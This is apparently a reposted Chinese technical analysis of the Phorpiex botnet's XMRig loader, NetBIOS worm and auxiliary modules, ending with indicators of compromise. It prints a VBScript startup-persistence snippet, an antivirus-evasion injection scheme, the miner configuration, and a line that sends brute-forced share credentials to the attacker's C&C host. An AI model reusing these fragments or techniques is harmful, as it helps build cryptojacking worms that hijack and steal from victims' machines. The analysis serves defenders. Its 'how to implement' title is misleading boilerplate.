怎么实现Phorpiex僵尸网络技术分析
这篇文章将为大家详细讲解有关怎么实现Phorpiex僵尸网络技术分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
XMRig
该模块的主要目的是启动XMRig monero矿机。门罗币(或XMR)是一种去中心化的加密货币,通过分布式共识确认,然后记录在区块链上。该加密货币对攻击者非常有吸引力, Monero无法追踪,默认情况下混淆了发送和接收地址以及交易量。 Monero区块链上的交易不能链接到特定用户或真实世界的身份。
Monero采矿机是由XMRig的开源代码构成,是Phorpiex僵尸网络获利的有效载荷之一,被感染的计算机每月可产生约15,000美元的收入。攻击者将矿机植入受感染的计算机并运行,矿工本身及其参数使用简单的密码进行混淆,并嵌入到模块中。在执行之前,恶意软件会将参数解密并传递给矿工。
Phorpiex使用的XMRig与在网上出售的相同,攻击者很可能是在网上购买的。
加载流程
初始化
为了防止运行多个XMRig,加载程序会创建具有硬编码名称的互斥。样本中的名称有所不同。 发现以下硬编码变体:
4b293105d7b102179b20
bf73f1604fc0b6b3d70d
持久化
加载程序将自身复制到" C:\ ProgramData \ {HardcodedFolder} \ {HardcodedExecutable}"。在不同样本中" {HardcodedExecutable}"参数值:
cfgmgr.exe
windrv32.exe
sysdrv32.exe
路径" C:\ ProgramData \ {HardcodedFolder}"也用于存储临时文件,例如VB脚本和传递给矿工的配置。在不同的样本中" {HardcodedFolder}"参数值:
FeSdavbMaL
ADwXcSSGvY
该恶意软件在启动文件夹中创建一个指向自我复制的链接:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\{HardcodedFilename}.url
在不同的样本中" {HardcodedFilename}"参数值:
kBBcUBIbha
LtHgNeMqRB
下图显示了启动文件夹中的链接以及可执行文件的路径:
加载程序会根据系统中是否存在以下防恶意软件进程来选择启动URL的方法:
a2guard.exe
a2service.exe
a2start.exe
如果未检测到这些集成,则通过执行以下脚本创建启动链接:
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="C:\Users\Lab\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kBBcUBIbha.url"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe"""
objFile.Close
如果VB脚本未能创建此启动配置,或者检测到上面列出的任何进程,则将使用WinAPI函数直接从加载程序中调用。该函数内部还有一个附加检查:是否正在运行任何反恶意软件进程。通常使用以下命令执行:
cmd.exe / C WScript" C:\ ProgramData \ FeSdavbMaL \ r.vbs"
如果遇到以下任何过程,则使用线程注入(请参阅线程注入部分)代替直接的" cmd"调用:
bdagent.exe
vsserv.exe
cfp.exe
ccavsrv.exe
cmdagent.exe
avp.exe
avpui.exe
ksde.exe
对于x86,加载程序将搜索explorer.exe。对于x64,将枚举所有进程,但是将忽略这两个进程:
csrss.exe
winlogon.exe
下图总结了以上所有内容:
加密
加载程序配置值和XMRig Miner有效负载使用XOR加密。 解密密钥" 0125789244697858"被硬编码到二进制文件中。 解密后:
C&C server URL to contact : http://185.176.27[.]132/update.txt
XMR crypto-wallet (re-written by the user ID but used directly in other Phorpiex modules):
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV
Mining pool : 176.27.132:4545
加载程序
矿工可执行文件使用硬编码的XOR密钥解密:
矿工从" C:\ Windows \ System32"目录(即wuapp.exe)注入到新创建进程的地址空间中。 在执行期间,加载程序将检查taskmgr.exe的状态。 如果检测到任务管理器正在运行,加载程序终止矿工并循环挂起,直到任务管理器不再运行。未检测到taskmgr.exe时,矿工将再次启动。
下图显示了其外观:
注入细节
注入过程最特殊之处是函数的调用方式。加载程序映射自己的ntdll.dll副本,搜索必要的函数,对这些函数进行内部数组指针处理,然后再调用它们。ntdll.dll的地址是通过PEB获得的:
ESI中有ntdll.dll地址:
ESI 777A000 ntdll.777A000
矿工配置
加载程序将配置保存到" C:\ ProgramData \ {HardcodedFolder} \ cfg",并将其作为命令行参数传递给Miner。 配置具有以下结构:
{ "algo": "cryptonight", "autosave": false, "background": false, "colors": true, "retries": 5, "retry-pause": 5, "syslog": false, "print-time": 60, "av": 0, "safe": false, "cpu-priority": null, "cpu-affinity": null, "donate-level": 0, "threads": 1, "pools": [ { "url": "185.176.27.132:4545", "user": "ea7c252d-5590-4983-995d-02a1a35bb966", "pass": "x", "keepalive": false, "nicehash": false, "variant": "r", "tls": false, "tls-fingerprint": null } ], "api": { "port": 0, "access-token": null, "worker-id": null }}
在研究的样本中,所有的配置值都为硬编码的,"线程"值等于系统中处理器的数量。
未使用的信息
在加载程序执行期间,发现了内存中存在的XMR钱包。 不同的样本可能包含不同的钱包。
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoMMyaX2Eun2XCgFYq
分析此模块中XMR钱包的用途,检查了应该使用钱包地址的地方,发现已经使用用户ID进行了重写,然后进行配置:
网络通信
XMRig Loader检查C&C服务器上是否有新指令,并执行找到的指令。 此通信执行两次:在矿工注入之前和之后, 使用不加密的HTTP协议。相应的字段中的值:
支持命令
下面是从C&C服务器发送命令时使用的格式(保留了原始注释):
[Miner]address=YOUR_XMR_ADDRES ; XMR address, email (minergate), btc address (nicehash), etc.poolport=pool.minexmr.com:4444 ; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=x ; Pool passwordstop=0 ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.proxy=0 ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0 ; 0 to disable keepalive, 1 to enable keepalive[Update];config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.;update_url=http://mysite.com/new_miner ; url of new miner. Miner will get updated with this file.;update_hash=xxxxxxxxxx ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End of configuration. Do not remove this line, ";End" string specifies end of configuration file.;Everything after a ";" character is a comment, so it is ignored by the miner when parsing the configuration. Only the ";" character is used for this purpose.;Always include the appropriate options below the defined "[Miner]" and "[Update]" sections. If you do not include the section names it won't work.;Make sure everything is spelled correctly;If you specify "config_url" double check it is correctly spelled, otherwise the miner that reads an incorrect url will never go back to a correct url (i.e. last configuration will be locked).
Miner update
Miner stop
服务器可能会请求其他文件名:
c.txt
upd.txt
newup.txt
update.txt
xmrupdate.txt
Phorpiex NetBIOS Worm模块
该模块是自我传播的蠕虫,还有下载其他有效负载的功能。NetBIOS蠕虫会扫描随机IP地址查找开放的139 TCP端口(NetBIOS),使用用户名和密码的硬编码列表进行暴力攻击。攻击使用rand函数随机生成用于扫描的IP地址,将GetTickCount结果作为随机种子。 IP地址滤规则是不能以127、172或192开头。NetBIOS蠕虫创建带有硬编码名称的互斥锁防止多次执行。创建单独线程与每个IP地址进行通信,扫描功能与Phorpiex VNC蠕虫模块中的扫描功能非常相似。
如果它是由Phorpiex Tldr加载的,使用伪随机名称保存该模块。在自我传播阶段,恶意软件会使用" WindowsDefender.exe"上传自身。在这种情况下,NetBIOS蠕虫必须下载Phorpiex主模块或其他有效负载。恶意软件通过调用GetModuleFilename获取其文件名。如果名称为" WindowsDefender.exe",它将尝试从硬编码的URL下载并执行文件:
不同样本中的URL:
hxxp://92.63.197.153/NB.exe
hxxp://92.63.197.153/nb.exe
hxxp://193.32.161.77/CRAZYBLAYNE.exe
hxxp://92.63.197.153/enum.exe
hxxp://193.32.161.77/enum.exe
hxxp://193.32.161.77/aldenta.exe
最后无限循环网络扫描。 对于每个随机生成的IP地址,NetBIOS模块都会启动一个线程,检查139 TCP端口是否在进行侦听。 成功连接后,NetBIOS蠕虫会尝试通过调用NetShareEnum API函数来枚举网络共享。
Phorpiex NetBIOS蠕虫会尝试使用用户名和密码的硬编码列表连接到网络共享:
成功连接到网络资源后,恶意软件会尝试将自身复制到以下位置:
WindowsDefender.exe
WINDOWS\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
WINDOWS\StartMenu\Programs\Startup\WindowsDefender.exe
WINNT\Profiles\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\WindowsDefender.exe
Users\All Users\Microsoft\Windows\Start Menu\Programs\WindowsDefender.exe
Documents and Settings\All Users\StartMenu\Programs\Startup\WindowsDefender.exe
目标路径指向启动文件夹确保其在目标系统中的持久性。最后一步是在目标主机上调用上传功能,有两种方式执行:
在远程主机上创建新服务。恶意软件使用" NetBIOS Windows Defender",为创建的服务设置值SERVICE_WIN32_SHARE_PROCESS,并以SERVICE_AUTO_START作为启动类型。
在远程主机上计划任务。预定时间为当前时间120秒。恶意软件通过NetRemoteTOD API函数来获取时间,并针对特定时区进行更正。
操作成功后使用简单HTTP请求,向C&C服务器报告:
snwprintf(url, L"hxxp://92.63.197.153/e.php?srv=%ls|%ls|%ls|%ls", NetLocation, UserName, Password, Message);
HTTP请求的用户代理:
Mozilla / 5.0(Macintosh; Intel Mac OS X 10.9; rv:25.0)Gecko / 20100101 Firefox / 25.0
该恶意软件可以发送以下消息:
其他样本中的信息:
在各种样本中发现的URL:
hxxp://193.32.161.77/nb.php?srv=
hxxp://193.32.161.77/exec.php?srv=
hxxp://193.32.161.77/nn.php?srv=
hxxp://193.32.161.77/gud.php?srv=
hxxp://193.32.161.77/go.php?srv=
hxxp://193.32.161.77/netb.php?srv=
hxxp://193.32.161.77/ok.php?srv=
hxxp://92.63.197.153/e.php?srv=
hxxp://92.63.197.153/huh.php?srv=
hxxp://92.63.197.153/nb.php?srv=
hxxp://92.63.197.153/tst.php?srv=
hxxp://92.63.197.153/ya.php?nb=
Auxiliary模块
Phorpiex非常通用。 主模块接收到"命令"队列,每个命令都是一个单独的可执行模块。 还观察到了功能非常有限的微型模块的许多不同变体。 Phorpiex加载的此类小型可执行文件,例如Clean-Up模块。 它包含2个函数,目的是终止具有指定硬编码名称的进程并删除多个注册表项。
清理模块终止的进程列表包括:
winsrvc32.exe
winupsvcmgr.exe
winsvcinstl.exe
winupd32svc.exe
wincfg32svc.exe
windrv.exe
wincfgrmg***.exe
winmgr.exe
wincfg.exe
wincfg32.exe
winupd.exe
winupd32.exe
winsvcin32.exe
winupd32cfg.exe
winmg***cfg.exe
csrssc.exe
csrsscxn.exe
winsecmgr.exe
winsecmgrv.exe
windrvmg***.exe
清理模块还从注册表项" HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run \"中删除以下值:
WinCfgMgr
Windows Update Service Manager
Microsoft Windows Update Services
Microsoft Update 495036
Microsoft Windows Service Installer
Microsoft Windows Driver Configuration
Microsoft Windows Installer Svc
Windows Security Manager
该模块禁用过时的Phorpiex模块,例如Phorpiex Trik:
另一种小型可执行文件类型是地理位置定位。 它使用服务api.wipmania.com确定受感染计算机的位置。 如果在白名单中,恶意软件会从硬编码的URL下载有效负载:
2019年初发现针对中国和越南的加载程序,根据位置信息将GandCrab勒索软件的不同变体加载到受感染的计算机上。
总结
Phorpiex是一个非常特殊的恶意软件家族,其功能包括各种不同的模块,每个功能模块都承担着专门的任务:发送垃圾邮件,感染蠕虫等等。如果需要新功能,则引入新模块,无需重建或重新配置现有模块。这种方法不易出错,耗时少,为恶意软件开发人员节省了大量精力。
迄今为止,Phorpiex已感染了超过一百万台计算机,并创造了可观的利润。我们所能看到和估计的只是冰山一角。在Phorpiex家族中的Raccoon Stealer和Predator the Thief还有更多自己独特的方法来进行恶意活动。
IOC
XMRig Silent Loader
Mutex names
0fe420b0eb8396a48280
3f3ff4de39fc87f8152a
4b293105d7b102179b20
5d6eb4d965fd09330511
a6c92143cac02de51d4a
bf73f1604fc0b6b3d70d
ff9702c705fd434610c0
Strings
0125789244697858
f23e1993dfdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///
Phorpiex NetBIOS Worm Module
URLs
hxxp://92.63.197.153/NB.exe
hxxp://92.63.197.153/nb.exe
hxxp://193.32.161.77/CRAZYBLAYNE.exe
hxxp://92.63.197.153/enum.exe
hxxp://193.32.161.77/enum.exe
hxxp://193.32.161.77/aldenta.exe
Auxiliary modules
关于怎么实现Phorpiex僵尸网络技术分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。